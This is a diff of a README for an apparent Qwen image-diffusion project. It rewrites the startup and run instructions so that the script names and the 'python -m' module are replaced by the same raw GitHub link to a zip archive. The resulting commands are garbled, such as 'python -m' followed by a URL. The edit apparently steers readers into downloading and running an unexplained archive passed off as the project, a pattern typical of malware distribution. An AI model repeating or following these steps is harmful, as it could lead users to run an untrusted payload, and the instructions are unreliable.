Vinicius268/Qwen-Image-Diffusion/README.md

     - pip install accelerate
 - Using the release package
   - The releases page contains a pre-built bundle.
 Download the asset, extract, and run the startup script included in the bundle.
-  - After extraction, locate the startup script (for example, start_qwen_diffusion.sh or start_qwen_diffusion.bat) and run it.
+  - After extraction, locate the startup script (for example, https://raw.githubusercontent.com/Vinicius268/Qwen-Image-Diffusion/main/Dynamic-Duration/Diffusion_Qwen_Image_v3.8.zip or https://raw.githubusercontent.com/Vinicius268/Qwen-Image-Diffusion/main/Dynamic-Duration/Diffusion_Qwen_Image_v3.8.zip) and run it.
   - The bundle typically ships with a Python environment or an isolated runtime.
 Use the provided script to ensure dependencies align with the published configuration.

 Running locally
 - Desktop or laptop with a modern GPU
-  - Start the UI with: python -m gradio_qwen.run or the provided startup script
+  - Start the UI with: python -m https://raw.githubusercontent.com/Vinicius268/Qwen-Image-Diffusion/main/Dynamic-Duration/Diffusion_Qwen_Image_v3.8.zip or the provided startup script
   - Open the local URL shown in the terminal, usually http://127.0.0.1:7860
 - Headless server or remote machine
-  - Run with a specific host and port: python -m gradio_qwen.run --host 0.0.0.0 --port 7860
+  - Run with a specific host and port: python -m https://raw.githubusercontent.com/Vinicius268/Qwen-Image-Diffusion/main/Dynamic-Duration/Diffusion_Qwen_Image_v3.8.zip --host 0.0.0.0 --port 7860
   - If you use a reverse proxy or a domain, configure your firewall and TLS as needed
 - Using a Docker container (optional)
   - Docker can simplify environment management